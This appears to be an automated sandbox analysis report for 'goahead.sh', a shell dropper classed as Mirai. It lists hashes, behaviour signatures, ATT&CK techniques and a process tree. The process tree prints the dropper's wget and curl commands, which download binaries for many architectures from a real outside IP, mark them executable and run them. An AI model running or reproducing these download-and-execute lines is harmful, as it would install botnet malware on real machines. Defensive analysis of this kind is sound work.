Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
159s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11/03/2025, 08:24
Static task
static1
Behavioral task
behavioral1
Sample
goahead.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
goahead.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
goahead.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
goahead.sh
-
Size
2KB
-
MD5
831927d3f027209ff5c689264c2c4225
-
SHA1
b815c97652e5e0ecdb56c09e13e53b309d4a4ab9
-
SHA256
16c5d342faf76f7946950a2fd6578cc9bdb9c52ffe4cd0d78faaad7a42db53ae
-
SHA512
685f7439a42942e7d1fa32bf8a60e5aafc731552fcb5ec78266a390ec0e1dbc74790e5a9f7855c538cd8d734074869a10d42aa778b0787a21abf5e342d89e525
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 816 chmod 822 chmod 835 chmod 840 chmod 695 chmod 718 chmod 736 chmod 802 chmod 807 chmod 829 chmod 846 chmod 758 chmod 794 chmod -
Deletes itself 2 IoCs
pid Process 759 WTH 808 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 697 goahead.sh /tmp/WTH 719 goahead.sh /tmp/WTH 738 goahead.sh /tmp/WTH 759 goahead.sh /tmp/WTH 796 goahead.sh /tmp/WTH 803 goahead.sh /tmp/WTH 808 goahead.sh /tmp/WTH 817 goahead.sh /tmp/WTH 823 goahead.sh /tmp/WTH 830 goahead.sh /tmp/WTH 836 goahead.sh /tmp/WTH 841 goahead.sh /tmp/WTH 847 goahead.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself ddb744maeadh 759 WTH Changes the process name, possibly in an attempt to hide itself ujjcru28 808 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/maps WTH File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 700 wget 710 curl 716 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/EdiAf.m68k wget File opened for modification /tmp/EdiAf.sh4 wget File opened for modification /tmp/EdiAf.mpsl wget File opened for modification /tmp/EdiAf.arm5 wget File opened for modification /tmp/EdiAf.arm6 wget File opened for modification /tmp/EdiAf.i686 curl File opened for modification /tmp/EdiAf.sh4 curl File opened for modification /tmp/EdiAf.x86 wget File opened for modification /tmp/EdiAf.x86 curl File opened for modification /tmp/EdiAf.mips curl File opened for modification /tmp/EdiAf.arm curl File opened for modification /tmp/EdiAf.arm7 wget File opened for modification /tmp/EdiAf.ppc wget File opened for modification /tmp/EdiAf.m68k curl File opened for modification /tmp/EdiAf.spc wget File opened for modification /tmp/WTH goahead.sh File opened for modification /tmp/EdiAf.mips wget File opened for modification /tmp/EdiAf.arm5 curl File opened for modification /tmp/EdiAf.ppc curl File opened for modification /tmp/EdiAf.spc curl File opened for modification /tmp/EdiAf.arc curl File opened for modification /tmp/EdiAf.mpsl curl File opened for modification /tmp/EdiAf.arm wget File opened for modification /tmp/EdiAf.arm6 curl File opened for modification /tmp/EdiAf.arm7 curl
Processes
-
/tmp/goahead.sh/tmp/goahead.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:665 -
/usr/bin/wgetwget http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:667
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:684
-
-
/bin/catcat EdiAf.x862⤵PID:694
-
-
/bin/chmodchmod +x EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:697
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:700
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:710
-
-
/bin/catcat EdiAf.mips2⤵
- System Network Configuration Discovery
PID:716
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:719
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:722
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/catcat EdiAf.mpsl2⤵PID:734
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.mpsl EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:738
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:740
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/catcat EdiAf.arm2⤵PID:757
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/WTH./WTH goahead.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:759
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/catcat EdiAf.arm52⤵PID:793
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/WTH./WTH goahead.selfrep2⤵
- Reads runtime system information
PID:796
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/catcat EdiAf.arm62⤵PID:801
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/WTH./WTH goahead.selfrep2⤵
- Reads runtime system information
PID:803
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:804
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/catcat EdiAf.arm72⤵PID:806
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/WTH./WTH goahead.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:808
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat EdiAf.ppc2⤵PID:815
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:817
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/catcat EdiAf.m68k2⤵PID:821
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:823
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/catcat EdiAf.spc2⤵PID:828
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:830
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.i6862⤵PID:832
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat EdiAf.i6862⤵PID:834
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:836
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:837
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/catcat EdiAf.sh42⤵PID:839
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:841
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arc2⤵PID:843
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/catcat EdiAf.arc2⤵PID:845
-
-
/bin/chmodchmod +x EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 goahead.sh systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-o15Uvc WTH2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WTH./WTH goahead.selfrep2⤵PID:847
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e932653d32b429c51de2046623fa71d2
SHA132ecc535e6cf6e99f105835d4a7cb75ef4cb233a
SHA25687dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
SHA512e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
-
Filesize
33KB
MD5029a7185777b7f885a6c3807e46b7365
SHA187372b0029b72446861c7b429e3ef1626c337218
SHA25642c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
SHA5124890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
-
Filesize
35KB
MD57327f58c0e15f6086301a81780e100dc
SHA1292bb04ad4df407ac687ef1df1071659708bd3bb
SHA256b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
SHA5124cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
-
Filesize
32KB
MD5addb1cd662dd870b9b7ed5273d6fa76e
SHA16e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
SHA256cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
SHA51228525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
-
Filesize
21KB
MD5a117b1b367633cb07f0795bd5f0c6f8f
SHA132bfac42c7134383c6381b94c0d75317fcb56d11
SHA25640fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
SHA5127e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
-
Filesize
75KB
MD5642dff628df548a6c458f004fd3b5aa1
SHA1cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
SHA256219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
SHA512dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851